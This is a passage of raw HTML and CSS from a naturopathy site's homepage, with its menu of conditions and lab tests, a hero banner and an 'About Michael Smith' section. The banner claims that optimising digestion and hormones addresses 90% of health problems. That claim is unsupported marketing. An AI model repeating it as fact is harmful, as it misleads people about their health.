.tcb-button-link { border-radius: 8px; overflow: hidden; border-image: initial; border-color: rgb(255, 255, 254); padding-top: 16px !important; padding-bottom: 16px !important; background-color: rgb(63, 181, 70) !important; background-image: none !important; }#tve_editor [data-css="tve-u-166c4035160"] .tcb-button-link { font-size: 25px; line-height: 36px; }#tve_editor [data-css="tve-u-166c4035161"] { font-family: Roboto !important; font-weight: 400 !important; color: rgba(255, 255, 255, 0.99) !important; font-size: 19px !important; }[data-css="tve-u-166c4049b9f"] { max-width: 41.2%; }[data-css="tve-u-166c4049bd0"] { max-width: 58.8%; }[data-css="tve-u-166c4035161"] strong { font-weight: 700 !important; }[data-css="tve-u-166c4077e20"] { width: 86px; float: none; margin: 40px auto -49px !important; padding-bottom: 1px !important; }[data-css="tve-u-166c408ba8f"] { border: 0px none rgb(102, 102, 102); border-radius: 0px; background-image: none; background-repeat: repeat; background-size: auto; background-attachment: scroll; background-position: 0% 0%; box-shadow: none; background-color: rgb(251, 255, 253) !important; }[data-css="tve-u-166c408ba91"] { padding: 35px 0px; color: rgb(51, 51, 51); min-height: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; }[data-css="tve-u-166c408bac9"] { max-width: 1190px; }[data-css="tve-u-166c4100417"] { width: 636px; float: none; margin-left: auto !important; margin-right: auto !important; margin-top: 20px !important; }[data-css="tve-u-166c411ae0b"] { width: 636px; float: right; z-index: 3; position: relative; margin-right: 0px !important; padding-left: 0px !important; padding-right: 0px !important; margin-left: 323px !important; }[data-css="tve-u-166c414447c"] { width: 636px; float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166c4161301"] { margin-top: 50px !important; margin-bottom: 0px !important; }[data-css="tve-u-166c4168b81"] { margin-top: 47px !important; margin-bottom: 0px !important; padding-bottom: 0px !important; padding-top: 0px !important; }[data-css="tve-u-166c417485e"] { float: none; z-index: 3; position: relative; width: 636px; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166c41a77cf"] { padding-left: 0px !important; margin-left: -18px !important; padding-right: 22px !important; }[data-css="tve-u-166c41abf68"] { padding-right: 0px !important; padding-left: 11px !important; }[data-css="tve-u-166c41b4daf"] { margin-top: -19px !important; }[data-css="tve-u-166c41ea0b9"] { margin-top: 21px !important; margin-bottom: 0px !important; padding-bottom: 0px !important; padding-top: 0px !important; }[data-css="tve-u-166c41f326e"] .tve_pg_container { border: none; background-color: rgb(255, 255, 255) !important; }#tve_editor [data-css="tve-u-166c4201935"]:hover .tcb-button-link { text-decoration: none !important; background-image: none !important; background-color: rgb(82, 204, 90) !important; border-color: rgb(255, 255, 255) !important; }[data-css="tve-u-166c4201935"] { display: block; max-width: 353px; width: 353px; margin-bottom: 50px !important; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166c4201935"] .tcb-button-link { border-radius: 8px; overflow: hidden; border-image: initial; border-color: rgb(255, 255, 254); padding-top: 16px !important; padding-bottom: 16px !important; background-color: rgb(63, 181, 70) !important; background-image: none !important; }#tve_editor [data-css="tve-u-166c4201935"] .tcb-button-link { font-size: 25px; line-height: 36px; }#tve_editor [data-css="tve-u-166c8625e0e"] { font-family: Roboto !important; font-weight: 400 !important; color: rgba(255, 255, 255, 0.99) !important; font-size: 19px !important; }[data-css="tve-u-166c8625e0e"] strong { font-weight: 700 !important; }[data-css="tve-u-166ff151d5a"] { padding-bottom: 10px !important; }[data-css="tve-u-166ff15256d"] { margin-bottom: 28px !important; }}@media (max-width: 767px){[data-css="tve-u-166c3f74e10"] { padding-left: 10px !important; padding-right: 10px !important; }[data-css="tve-u-166c3e0f690"] { padding-left: 15px !important; padding-right: 15px !important; }[data-css="tve-u-166c421dd49"] { padding-left: 15px !important; padding-right: 15px !important; }[data-css="tve-u-166c3ea69e3"] .tcb-button-link { padding-left: 15px !important; }[data-css="tve-u-166c3ea69e3"] { margin-left: 17px !important; }[data-css="tve-u-166c3fb20f7"] { padding-left: 15px !important; padding-right: 15px !important; }[data-css="tve-u-166c3f82fa5"] { margin-right: 37px !important; padding-right: 37px !important; }[data-css="tve-u-166c4229a64"] { padding-left: 15px !important; padding-right: 15px !important; }[data-css="tve-u-166c4161301"] { padding-left: 15px !important; padding-right: 15px !important; }[data-css="tve-u-166c4201935"] { margin-left: 15px !important; margin-right: 15px !important; }[data-css="tve-u-166c3ff0d56"] { float: none; margin-left: auto !important; margin-right: auto !important; }[data-css="tve-u-166c411ae0b"] { float: none; margin-left: 62px !important; margin-right: auto !important; }}[data-tve-custom-colour="89805775"] { box-shadow: transparent 0px 0px 8px 4px inset, transparent 0px 0px 7px 3px !important; border-color: rgb(102, 102, 102) !important; background-color: rgb(255, 255, 255) !important; }</style> <style type="text/css" id="wp-custom-css"> /* You can add your own CSS here. Click the help icon above to learn more. *//* .bSe.left .awr .entry-title{ display:none; } .bSe.fullWidth .awr .entry-title{ display:none!important; }*/ .thrv_wrapper.thrv_heading.gi-map-purpose.tve_empty_dropzone{ border-radius: 5px!important; } .thrv_wrapper.thrv_heading.tve_empty_dropzone{ border-radius: 5px!important; } .tcb-button-text.thrv-inline-text{ } </style> <script src="//cdn.geni.us/snippet.min.js" defer></script> <script type="text/javascript"> jQuery(document).ready(function( $ ) { var ale_on_click_checkbox_is_checked=""; if(ale_on_click_checkbox_is_checked) { Georiot.amazon.addOnClickRedirect(4632, true); } else { Georiot.amazon.convertToGeoRiotLinks(4632, true); }; }); </script> <style type="text/css">.hrm-pre-header-phone-number{ background: center left; background-size: 18px; background-repeat: no-repeat; padding-left: 25px; display:none; } .bSe a, .cnt a { color: #1a0dab; } .bSe a:hover, .cnt a:hover { text-decoration: underline; } a.fb, .aut-t h3 a { text-decoration: initial; } .gform_description{ padding-top: 20px; margin-bottom: 15px; display: block; } .ginput_complex label, .gfield_description{ color: #8c8c8c; } .gform_body .gform_fields { margin-left: 0 !important; } .gform_validation_error .validation_error, .gform_validation_error .validation_message{ color: #d86166; } .gform_body ul li { padding: 0; list-style-type: none; margin-bottom: 25px; } .bSe .gform_body ul li:before { content: ''; } .ginput_container input, .ginput_container textarea{ font-family: 'Open Sans', sans-serif; border-radius: 0; border: 3px solid #e5e5e5; color: #a2a2a2; font-style: italic; font-weight: 400; font-size: 1em; height: auto; /* line-height: 17px; */ margin-top: 0; padding: 22px 20px !important; } .ginput_container select{ border-radius: 3px; border: 3px solid #e5e5e5; color: #aaaaaa; padding: 22px 20px !important; font-size: 1em; } .gform_body input, .gform_body select, .ginput_container textarea { width: 100%; box-sizing: border-box; } .gform_footer input[type="submit"]{ font-family: 'Lato', sans-serif; border-radius: 0; box-shadow: none; font-weight: 700; font-size: 18px; padding: 26px 10px; text-shadow: none; background: #8dc63f; border: 0; color: white; width: 100%; box-sizing: border-box; cursor: pointer; } .ginput_container_checkbox .gfield_checkbox{ -webkit-columns: 2 200px; -moz-columns: 2 200px; columns: 2 200px; margin-left: 0 !important; padding-left: 0; } .hrm-checkbox-1-col .gfield_checkbox{ -webkit-columns: 2 200px; -moz-columns: 2 200px; columns: 1; margin-left: 0 !important; padding-left: 0; } .ginput_container_checkbox input{ width: auto; } ul.gfield_checkbox li { margin-bottom: auto !important; } .ui-datepicker { background: #d3d3d3; font-family: sans-serif; padding: 12px; border-radius: 0 0 3px 3px; } .ui-datepicker-prev, .ui-datepicker-next{ cursor: pointer; } .ui-datepicker .ui-datepicker-next{ float: right; } .ui-datepicker-month, .ui-datepicker-year{ font-size: 18px; margin: 8px 0; } .ui-datepicker-month{ margin-right:5px; } .ui-datepicker th{ padding: 3px 6px; } .ui-datepicker tr { text-align: center; } /* #gform_wrapper_2 Spesific Style (Test's Enquiry Form) */ /* #gform_wrapper_2 .gform_wrapper{ background: #492c3b !important; border-radius: 2px; border-width: 0; padding: 30px; margin-bottom: 30px; } #gform_wrapper_2 label.gfield_label { color: white; } #gform_wrapper_2 .ginput_container_checkbox .gfield_checkbox{ color: #FFF; } */ @media only screen and (min-width: 1024px) { #gform_wrapper_2 li#field_2_1 { Width: 49%; margin-right: 2%; display: inline-block; } #gform_wrapper_2 li#field_2_2 { Width: 49%; display: inline-block; } } @media only screen and (max-width: 774px) { ul.gfield_checkbox li { margin-bottom: 12px !important; } } /* THEME CUSTOM CSS */ #floating_menu header{ background-color: #fff } header nav > ul.menu > li > a { color: #000000; } header nav > ul.menu > li > a:hover { color: #81d742; } /* MOBILE MENU */ #mobile-quick-access-menu{ display: block; float: right; height: 35px; line-height: 35px; margin-top: 15px; margin-bottom: 20px; vertical-align: middle; margin-right: 15px; } @media only screen and (min-width: 774px) { #mobile-quick-access-menu{ display: none; } } #mobile-quick-access-menu ul{ floast: left; } #mobile-quick-access-menu li { display: inline-block; top: -1px; position: relative; } #mobile-quick-access-menu li a { padding: 0px 8px; color: #fff; } #mobile-quick-access-menu li a:hover { color: #000; } /* ---- FB Like button on blog posts ---- */ #hrm-pre-content-fb-button{ display: inline-block; padding: 3px 0 8px 0; border-top: 1px solid #e6e6e6; border-bottom: 1px solid #e6e6e6; width: 100%; margin-bottom: 10px; } #hrm-like-us-on-fb, #hrm-fb-buttons{ float: left; } #hrm-like-us-on-fb{ font-size: 12px; line-height: 12px; text-transform: uppercase; font-weight: bold; margin: 11px 15px 5px 0; display: inline-block; } @media screen and (min-width: 550px) { #hrm-fb-button-mobile{ display: none; } } #hrm-fb-button-large{ display: none; } @media screen and (min-width: 550px) { #hrm-pre-content-fb-button{ padding: 10px 0 8px 0; } #hrm-fb-button-large{ display: inline-block; } #hrm-like-us-on-fb{ margin: 8px 15px 5px 0; } } /* ---- Landing Pages ---- */ .hrm-landing-quote-box .tve_ts3 .tve_ts_o { display: none !important; } .bSe h2 { font-weight: 500; } .bSe h2, .tve-woocommerce .bSe h2 { font-family: Roboto,sans-serif; } .bSe h2 { color: #45BF55; } h2 { color: #45BF55; font-size: 1.389em; margin: 25px 0 12px 0; line-height: 1.4em; } header #logo > a > img { margin-bottom: -8px; } ul, ol { margin-top: -5px; } header nav > ul.menu > li > a { color: #666; font-weight: 600; font-family: Roboto; } footer section ul li>a { color: #9a9a9a; font-size: 15px; } footer .fmw { padding: 60px 0 30px; background: #eee; } footer section ul li:before { color: #3fb546; font-weight: 800; } footer section ul li { font-weight: 400!important; margin-bottom: 10px!important; } footer .fmw p { color: #3fb546; font-family: Roboto Slab; font-weight: 600; } footer .fmm .ft-s>span { margin-top: 2px; } header nav > ul.menu > li > a:hover { color: #3fb546; }</style> </head> <body class="home page-template page-template-fullwidth-page page-template-fullwidth-page-php page page-id-4607"> <div class="theme-wrapper"> <div class="h-bi"> <div id="floating_menu" data-float="float" data-social='0'> <header class="side" style=""> <div class="h-i"> <div class="wrp"> <div id="logo" > <a href="https://www.planetnaturopath.com/"> <img src="https://www.planetnaturopath.com/wp-content/uploads/2018/11/Logo.svg" alt="Planet Naturopath"></a> </div> <div class="m-s"> <div class="hsm"></div> <div class="m-si"> <nav class="menu-header-menu-container"><ul id="menu-header-menu" class="menu"><li id="menu-item-631" class="menu-item menu-item-type-post_type menu-item-object-page toplvl"><a href="https://www.planetnaturopath.com/about-2/">About</a></li> <li id="menu-item-1573" class="menu-item menu-item-type-post_type menu-item-object-page toplvl"><a href="https://www.planetnaturopath.com/blog/">Blog</a></li> <li id="menu-item-2170" class="menu-item menu-item-type-post_type menu-item-object-page toplvl"><a href="https://www.planetnaturopath.com/resources/">Resources</a></li> <li id="menu-item-2263" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children toplvl dropdown"><a >Problems We Solve</a><ul class="sub-menu"> <li id="menu-item-4709" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/adrenal-fatigue/" class=" colch ">Adrenal Fatigue</a></li> <li id="menu-item-2265" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/cardiovascular-disease/" class=" colch ">Cardiovascular Disease &#038; Health</a></li> <li id="menu-item-2266" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/depression-and-anxiety/" class=" colch ">Depression and Anxiety</a></li> <li id="menu-item-2267" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/fatigue/" class=" colch ">Fatigue</a></li> <li id="menu-item-2268" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/irritable-bowel-syndrome-testing/" class=" colch ">Irritable Bowel Syndrome Testing</a></li> <li id="menu-item-2269" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/optimal-athlete-health/" class=" colch ">Optimal Athlete Health</a></li> <li id="menu-item-2270" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/parasite-bacterial-infections/" class=" colch ">Parasite and Bacterial Infections</a></li> <li id="menu-item-2271" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/small-intestinal-bacterial-overgrowth-sibo/" class=" colch ">Small Intestinal Bacterial Overgrowth (SIBO)</a></li> <li id="menu-item-2272" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/thyroid-imbalance/" class=" colch ">Thyroid Imbalance</a></li> <li id="menu-item-2273" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/weight-loss/" class=" colch ">Weight Loss</a></li> <li id="menu-item-2274" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/womens-hormone-health/" class=" colch ">Women’s Hormone Health</a></li> </ul></li> <li id="menu-item-2109" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children toplvl dropdown"><a href="#">Tests We Offer</a><ul class="sub-menu"> <li id="menu-item-4551" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/g-map-test/" class=" colch ">G.I Map test</a></li> <li id="menu-item-4511" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/cardiovascular-tests/" class=" colch ">Cardiovascular Tests</a></li> <li id="menu-item-3417" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/cdsa-test/" class=" colch ">CDSA Test</a></li> <li id="menu-item-2125" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/comprehensive-test-packages/" class=" colch ">Comprehensive Test Packages</a></li> <li id="menu-item-4554" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/dutch-test/" class=" colch ">DUTCH Test</a></li> <li id="menu-item-4542" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/organic-acids/" class=" colch ">Organic Acids</a></li> <li id="menu-item-2114" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/saliva-hormone-testing/" class=" colch ">Saliva Hormone Testing</a></li> <li id="menu-item-4600" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/sibo-test/" class=" colch ">SIBO Test</a></li> <li id="menu-item-3441" class="menu-item menu-item-type-post_type menu-item-object-page"><a href="https://www.planetnaturopath.com/thyroid-testing/" class=" colch ">Extensive Thyroid Testing</a></li> </ul></li> <li id="menu-item-3488" class="menu-item menu-item-type-post_type menu-item-object-page toplvl"><a href="https://www.planetnaturopath.com/consulting-us/">Consulting</a></li> </ul></nav> <!-- Cart Dropdown --> </div> <nav id="mobile-quick-access-menu"> <ul class="menu"> <li class="menu-item-object-page toplvl"><a href="https://www.planetnaturopath.com/">Free Guide</a></li> </ul> </nav> </div> </div> </div> </header> </div> </div> <div class="wrp cnt"> <section class="bSe fullWidth"> <div class="awr"> <div class="awr-i"> <div id="tve_flt" class="tve_flt"><div id="tve_editor" class="tve_shortcode_editor"><div class="thrv_wrapper thrv_page_section" data-tve-style="1" style="margin-bottom: 40px !important;"> <div class="out" style="" data-tve-custom-colour="89805775"> <div class="in darkSec" style="padding-top: 0px !important; padding-bottom: 0px !important;"> <div class="cck tve_clearfix tve_empty_dropzone"> <div class="thrv_wrapper thrv-page-section tve_empty_dropzone tcb-window-width tcb-video-background-parent" data-tve-style="1" data-css="tve-u-166c3d9f736" style="width: 1603px; left: -206.5px;"><div class="tve-page-section-out tcb-video-background-el" data-css="tve-u-166c3d9f733"><video playsinline="" autoplay="" muted="" loop="" class="tcb-bg-video" data-title="PlanetNaturopath Homepage Video" data-id="4673"><source src="https://www.planetnaturopath.com/wp-content/uploads/2018/11/PlanetNaturopath-Homepage-Video.mp4" type="video/mp4"></video></div><div class="tve-page-section-in" data-css="tve-u-166c3d9f75c"> <div class="thrv_wrapper thrv-columns" data-css="tve-u-166c3f5a587"><div class="tcb-flex-row tcb--cols--2" data-css="tve-u-166c3f5ac5d"><div class="tcb-flex-col"><div class="tcb-col" data-css="tve-u-166c3f2de8e"><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166c3e0f690"><h1 data-css="tve-u-166c3deab2f" spellcheck="false" style="text-align: left;">Discover How To Easily Optimise Your Digestion and Hormones That Will Address 90% of Your Health Problems<span data-css="tve-u-166c3df82d1" style="font-family: Roboto;"><span style="font-size: 18px; color: rgb(255, 255, 255);" data-css="tve-u-166c3df43e6"></span></span></h1></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166c421dd49"><h1 data-css="tve-u-166c3deab2f" spellcheck="false"><span data-css="tve-u-166c3df82d1"><span data-css="tve-u-166c3df43e6"><strong>Hint:</strong> the best strategies can be implemented for FREE right now</span></span></h1></div><div class="tcb-clear" data-css="tve-u-166c3ea69e4"><div class="thrv_wrapper thrv-button tve_ea_thrive_lightbox" data-css="tve-u-166c3ea69e3" data-tcb_hover_state_parent="false" data-button-style="full_rounded"> <a href="https://planetnaturopath.thrivecart.com/sibo-test/?_ga=2.159269498.1948163596.1541820586-60857572.1537223917" class="tcb-button-link tve_evt_manager_listen tve_et_click" data-tcb-events="__TCB_EVENT_[{&quot;config&quot;:{&quot;l_anim&quot;:&quot;instant&quot;,&quot;l_id&quot;:&quot;1526&quot;},&quot;a&quot;:&quot;thrive_lightbox&quot;,&quot;t&quot;:&quot;click&quot;}]_TNEVE_BCT__"> <span class="tcb-button-texts"><span class="tcb-button-text thrv-inline-text" data-css="tve-u-166c3ea69eb"><span data-css="tve-u-166c3eac80e"><strong>Yes, show me how!</strong></span></span></span> </a> </div></div></div></div><div class="tcb-flex-col"><div class="tcb-col" data-css="tve-u-166c3f5d938"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166c3f1dced"><span class="tve_image_frame" style="width: 100%;"><img class="lazy lazy-hidden tve_image wp-image-4616" alt="" width="650" height="570" title="michael-smithv3" data-id="4616" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png" style="width: 100%;"><noscript><img class="lazy lazy-hidden tve_image wp-image-4616" alt="" width="650" height="570" title="michael-smithv3" data-id="4616" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png" style="width: 100%;" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png 650w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-150x132.png 150w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-300x263.png 300w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-80x70.png 80w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-220x193.png 220w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-114x100.png 114w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-171x150.png 171w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-271x238.png 271w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-473x415.png 473w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-555x487.png 555w" sizes="(max-width: 650px) 100vw, 650px" /><noscript><img class="tve_image wp-image-4616" alt="" width="650" height="570" title="michael-smithv3" data-id="4616" src="//www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png" style="width: 100%;" srcset="https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3.png 650w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-150x132.png 150w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-300x263.png 300w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-80x70.png 80w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-220x193.png 220w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-114x100.png 114w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-171x150.png 171w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-271x238.png 271w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-473x415.png 473w, https://www.planetnaturopath.com/wp-content/uploads/2018/10/michael-smithv3-555x487.png 555w" sizes="(max-width: 650px) 100vw, 650px" /></noscript></noscript></span></div></div></div></div></div> </div> </div> </div> </div> </div> </div><div class="thrv_wrapper thrv-page-section tve_empty_dropzone tcb-window-width" data-tve-style="1" data-css="tve-u-166c3f94f65" style="width: 1603px; left: -206.5px;"><div class="tve-page-section-out" data-css="tve-u-166c3f94e83"></div><div class="tve-page-section-in" data-css="tve-u-166c3f94f95"> <div class="thrv-columns thrv_wrapper" style="margin-bottom: 0px;" data-css="tve-u-166c3fdc50c"><div class="tcb-flex-row tcb--cols--2 tcb-resized" style="margin-top: 0px !important; margin-bottom: 0px !important; padding-top: 0px; padding-bottom: 0px;"> <div class="c-33 tve_empty_dropzone tcb-flex-col" data-css="tve-u-166c4049b9f" style=""><div class="tcb-col"><div style="width: 380px; margin-left: 20px !important;" class="thrv_wrapper tve_image_caption img_style_rounded_corners" data-css="tve-u-166c3f82fa5"> <span class="tve_image_frame" style="width: 100%;"> <img class="lazy lazy-hidden tve_image wp-image-638" alt="Michael Smith" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2010/06/michael.jpg" style="width: 100%;" width="237" height="184" title="michael" data-id="638"><noscript><img class="lazy lazy-hidden tve_image wp-image-638" alt="Michael Smith" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2010/06/michael.jpg" style="width: 100%;" width="237" height="184" title="michael" data-id="638" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael.jpg 237w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-150x116.jpg 150w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-80x62.jpg 80w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-220x171.jpg 220w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-129x100.jpg 129w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-193x150.jpg 193w" sizes="(max-width: 237px) 100vw, 237px" /><noscript><img class="tve_image wp-image-638" alt="Michael Smith" src="//www.planetnaturopath.com/wp-content/uploads/2010/06/michael.jpg" style="width: 100%;" width="237" height="184" title="michael" data-id="638" srcset="https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael.jpg 237w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-150x116.jpg 150w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-80x62.jpg 80w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-220x171.jpg 220w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-129x100.jpg 129w, https://www.planetnaturopath.com/wp-content/uploads/2010/06/michael-193x150.jpg 193w" sizes="(max-width: 237px) 100vw, 237px" /></noscript></noscript> </span> </div></div></div> <div class="c-66 tve_empty_dropzone tcb-flex-col" data-css="tve-u-166c4049bd0" style=""><div class="tcb-col"><div class="thrv_wrapper thrv_text_element tve_empty_dropzone" data-css="tve-u-166c3fb20f7"><h1 class="" data-css="tve-u-166c3fa5580" data-unit="px" style="line-height: 35px; margin-bottom: 15px !important; margin-left: 20px !important;"><span class="tve_custom_font_size" data-css="tve-u-166c3fa55a7"><font color="#f4f4f4"><span data-css="tve-u-166c3fb8564" style="color: rgb(63, 181, 70);">About Michael Smith</span></font></span></h1><p spellcheck="false" style="margin-left: 20px !important; margin-bottom: 25px !important;"><font color="#f4f4f4"><span data-css="tve-u-166c3fa9150" style="color: rgb(102, 102, 102);">Hi, it's Michael here from Planet Naturopath. I originally come from Melbourne, where I had a career as a very busy chef. As I struggled with my own health problems during this time, I developed an interest in the effects of food and nutrition on health - this led me down the path of many years of study to improve my own health.<br><br>If you are someone who has been struggling with their health for a long time and not getting results with doctors and specialists, I can help you uncover the cause of your problems through specialized functional medicine testing.</span></font></p></div><div class="tcb-clear" data-css="tve-u-166c3fde82b"><div class="thrv_wrapper thrv-button" data-css="tve-u-166c3fbf397" data-tcb_hover_state_parent="false" data-button-style="full_rounded" data-button-size="s"> <a href="https://www.planetnaturopath.com/about-2" class="tcb-button-link" rel="nofollow"> <span class="tcb-button-texts"><span class="tcb-button-text thrv-inline-text" data-css="tve-u-166c3ea69eb"><span data-css="tve-u-166c3eac80e">About me</span></span></span> </a> </div></div></div></div> </div></div> </div> </div><div class="thrv_wrapper thrv-page-section tcb-window-width" style="width: 1603px; left: -206.511px;" data-css="tve-u-166c3f74e10"> <div class="tve-page-section-out" data-css="tve-u-166c3f74e0f"></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-166c3f74e11"><div style="width: 1600px;/* margin-bottom: 40px !important; */" class="thrv_wrapper tve_image_caption" data-css="tve-u-166c3f74e0e"> <span class="tve_image_frame"> <img class="lazy lazy-hidden tve_image wp-image-3183" alt="" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final.png" style="width: 1600px" width="1600" height="75" title="20160816-PN-As-Seen-Horizontal-final" data-id="3183"><noscript><img class="lazy lazy-hidden tve_image wp-image-3183" alt="" src="//www.planetnaturopath.com/wp-content/plugins/a3-lazy-load/assets/images/lazy_placeholder.gif" data-lazy-type="image" data-src="//www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final.png" style="width: 1600px" width="1600" height="75" title="20160816-PN-As-Seen-Horizontal-final" data-id="3183" srcset="" data-srcset="https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final.png 1600w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-150x7.png 150w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-300x14.png 300w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-768x36.png 768w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-1024x48.png 1024w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-80x4.png 80w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-220x10.png 220w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-250x12.png 250w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-280x13.png 280w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-510x24.png 510w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-750x35.png 750w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-975x46.png 975w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-1190x56.png 1190w" sizes="(max-width: 1600px) 100vw, 1600px" /><noscript><img class="tve_image wp-image-3183" alt="" src="//www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final.png" style="width: 1600px" width="1600" height="75" title="20160816-PN-As-Seen-Horizontal-final" data-id="3183" srcset="https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final.png 1600w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-150x7.png 150w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-300x14.png 300w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-768x36.png 768w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-1024x48.png 1024w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-80x4.png 80w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-220x10.png 220w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-250x12.png 250w, https://www.planetnaturopath.com/wp-content/uploads/2017/10/20160816-PN-As-Seen-Horizontal-final-280x13.png 280w, 